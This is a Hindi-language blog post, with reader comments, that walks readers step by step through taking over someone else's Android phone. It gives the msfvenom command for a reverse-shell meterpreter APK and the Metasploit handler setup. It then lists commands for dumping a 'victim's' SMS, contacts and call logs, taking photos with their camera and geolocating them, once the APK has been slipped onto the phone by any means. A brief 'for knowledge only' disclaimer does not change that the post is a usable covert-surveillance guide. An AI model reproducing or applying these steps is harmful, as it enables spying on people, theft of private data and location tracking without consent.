How To Hack Any Android Phone Using Kali Linux In Hindi

Hello friends waise tho aap ne iske pehle bahut saare blog's, websites, YouTube par mobile hacking ke baare me padha ya dekha hoga lekin aaj ham aap ko wo secret technique share karne jaa rahe hai. Jise padh kar aur step by step follow kar aap kisi bhi Android mobile ko control kar sakte ho tho agar aap bhi ye technique ko sikhna chahate ho tho is post end tak padho aur apne friends ke sath ye technique share karo.



Ye jankari sirf Knowledge ke liye hai. Ise sirf Apne Knowledge ke liye hi rakhe. Kyuki technology ka use kar kisi ko bhi pareshan karna Crime hai aur ham use badawa nahi dete hai.

Cyber Crime Kya Hai ? Cyber Crime Se Kaise Bache ?


Kisi Bhi  Android Mobile Ko kaise Hack kare Step by Step In Hindi

hack-android-phone-using-kali-linux
Friends agar aapne Aaj ke post ko dyan se padhakar aur samaj kar har step ko technically follow karte ho tho aap Duniya ke kisi bhi Android Phones ko aasani hack kar sakte ho jaise ki 

  • Kisi bhi mobile ki Send aur Receive SMS ki list check karni ho 

  • Kisi bhi phone ki Contact list dekhni ho

  • Kisi bhi mobile ki Call log list dekhni ho

  • Victim ka Whatsapp bhi Hack kar sakte ho ya Message Spoofing  bhi kar sakte ho
  • Aap victim ke mobile se victim ka photo bhi click kar sakte ho

  • Agar aap victim ke mobile ki location jaanna chahate ho tho aap Victim ka Location bhi trace kar sakte ho
Is tarah ke kahi saare kaam aap apne system ke kisi bhi Android Phone me kar sakte ho

Friends aap ko kisi bhi tarah ki Advance Level ki Hacking karni hai, tho aap Kali Linux ke baare me pata hona jaroori hai. Aur aap ye Operating System ko operate karna bhi aana chahiye kyuki Kali Linux ek perfect hacking tool ka package hai. Jaha hacking related tamam tools available hai. Tho ye post shuruwath mai ye samaj kar karta hu ki aap sabhi ko Kali Linux ke baare me pata hai aur agar nahi bhi pata hai tho aap Kali Linux ke baare me pata kar loge.


1> Sabse pehle apne Computer me Kali Linux open kare aur Terminal ko khole

2> Terminal open karne ke baad usme niche ↓ ka command type kare.

msfvenom-p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=4444 R>techchip.apk 

kali-linux-terminal

Yaad rakhe hamne jo upper IP Address likha hai wo hamhare computer ka hai [192.168.1.100] aap ko yaha apne Computer ka IP Address enter karna hai. Agar aapko apne Computer ka IP Address nahi pata hai tho aap "ifconfig" command type karke Enter kare aur aap ko apne Computer ka IP Address mill jayega.

Jaise hi aap poora Command aur IP Address type karke enter button press karogo waise hi aapke Computer me Fvenom tool run hoga aur root folder me techchip.apk naam ki file generated hogi.

kali-linux-terminal-run-fvenom

Aap niche ke images me dekh sakte hai ki hamhare computer ke root folder me techchip.apk file create huyi hai [same usi tarah aapke root folder me aap ke naam ki.apk file create huyi hogi]

kali-linux-root-folder

Ab aapka sirf ek hi kaam reh jata hai ki ye .apk file kisi bhi tarah se us victim mobile me install kare jaise hi ye Application kisi bhi mobile me Install ho jati hai tho aap phir se apne Window par jayiye 

Ab terminal par ye msfconsol command type kare.

kali-linux-opening-console

msfconsol type karne ke baad Enter press kare. Jaise hi aap Enter button press karte ho waise hi Consol open hoga.

kali-linux-console

Consol open hone ke baad waha par ham type karenge →use multi/handler 

Ye command type karne ke baad Enter button press kare. Phir ham pay load set karenge jaise ki set payload android/meterpreter/reverse_tcp phir enter press kare.

Payload create hone ke baad hamhe ek aur Command type karna hoga jaise ki set lhost 192.168.1.100 Enter Button press kare [ yaad rakhe yaha aapko apne Computer ka IP Address type karna hoga ]

Enter press karne ke baad hamhe lport set karna hai. jaise ki set lport 4444→Enter press kare.

Uske baad ham type karenge exploit→Enter 

kali-linux-terminal

Friends victim ke mobile me hamhare dwara install kiya software hoga tho hi ye Exploit work karega. Jaise hi victim mobile ko open karega waise hi uske mobile ka poora Control aapke haath me aayega.

Ab ye sab kaise hoga ye sawal aapke dimag me aaya hoga tho Friends aapko kuch commands type karne honge jiske help se aap Victim ke mobile ko ghar baite - baite access kar sakte hai. Jaise ki 

  • Agar aapko aapke victim ke mobile ki Information dekhni ho tho aapko sysinfo command type karke enter kare. Aapko victim ke Mobile ke poori information mil jayegi.

mobile-info-in-kali-linux

  • Agar aapko pata karna hai ki victim ka mobile Root hai ya nahi tho aap type kare check_root→Press Enter
      Android Mobile Ko Root Kaise Kare ?

checking-mobile-root-kali-linux



  • Aapko victim ke Mobile me kitne camera hai. Yani Front with back camera hai ya only back camera hai. Ye dekhna ho tho type kare webcam_list aur Enter button press kare.

checking-camera-in-kali-linux

  • Ab aapko victim ke mobile se photo click karna ho tho simply ye command type kare →webcam_snap jaise hi aap ye command type karogo tho aap ke root folder me victim ke mobile se liya hua photo save hoga.


[ Agar aapko front camera se photo click karni hai tho →webcam_snap 2 type kare. Phir victim ke front camera se photo click hogi ] 

taking-pic-in-kali-linux

  • Agar aap ko victim ka Contact numbers check karna hai tho ye command type kare dump_contact phir enter button press kare. Victim ki Contact ki poori text file aapke root folder me save ho jayegi.

  • Agar aap ko victim ke Message dekhna hai tho type karedump_sms→Press Enter

  • Agar aapko victim ki call logs check karna hai tho type kare dump_calllog→Press Enter | Call Log ki file aap ke root folder me save ho jayegi.

checking-call-log-in-kali

  • Agar aapko victim ki location pata karna hai. Tho aap ko type karna hoga geolocate→Press Enter [ jiske baad aapke samane ek Google Map ki Link show hogi. Jaha click karke direct victim ka Location pata kar sakte ho


Friends in commands ke alawa aap ko aur bhi commands ki jankari chahiye tho type kare Help aur Enter button press kare. Aapke samne saare commands ki list open hogi. Jisse aap aaram se ghar par bhaith kar victim par try kar sakte ho...



I hope friends aaj ka ye post aapko kaafi jyada pasand aaya hoga, agar aapko aise  hi Articles padhna pasand hai tho aap hamhara blog subscriber kare aur  is post se related koi bhi sawal hai tho aap niche comment kare aur hamhe aapki help bhaut khushi hogi.

     Thanks For Reading

Post a Comment

6 Comments

  1. wow really nice post very helpful :)

    ReplyDelete
  2. Bro terminal kya hota hai aur kaha se dawnload hota pls knowlage me pls bro

    ReplyDelete
    Replies
    1. Windows me jaise command prompt rehta hai waise hi linux me bhi hota hai usse hum terminal kehte aur Hum terminal ko Download nahi kar sakte yeh inbuilt rehta.

      Delete
  3. Sir victim ke phone ka data apni pc me download krne me net ki zaroorat hoti h...

    ReplyDelete
    Replies
    1. ha aapko victim ka data apne pc me leko liye internet ki jaroorat hoti hai, aur yeh jo poora process hai wo internet ke trough hi possible hai

      Delete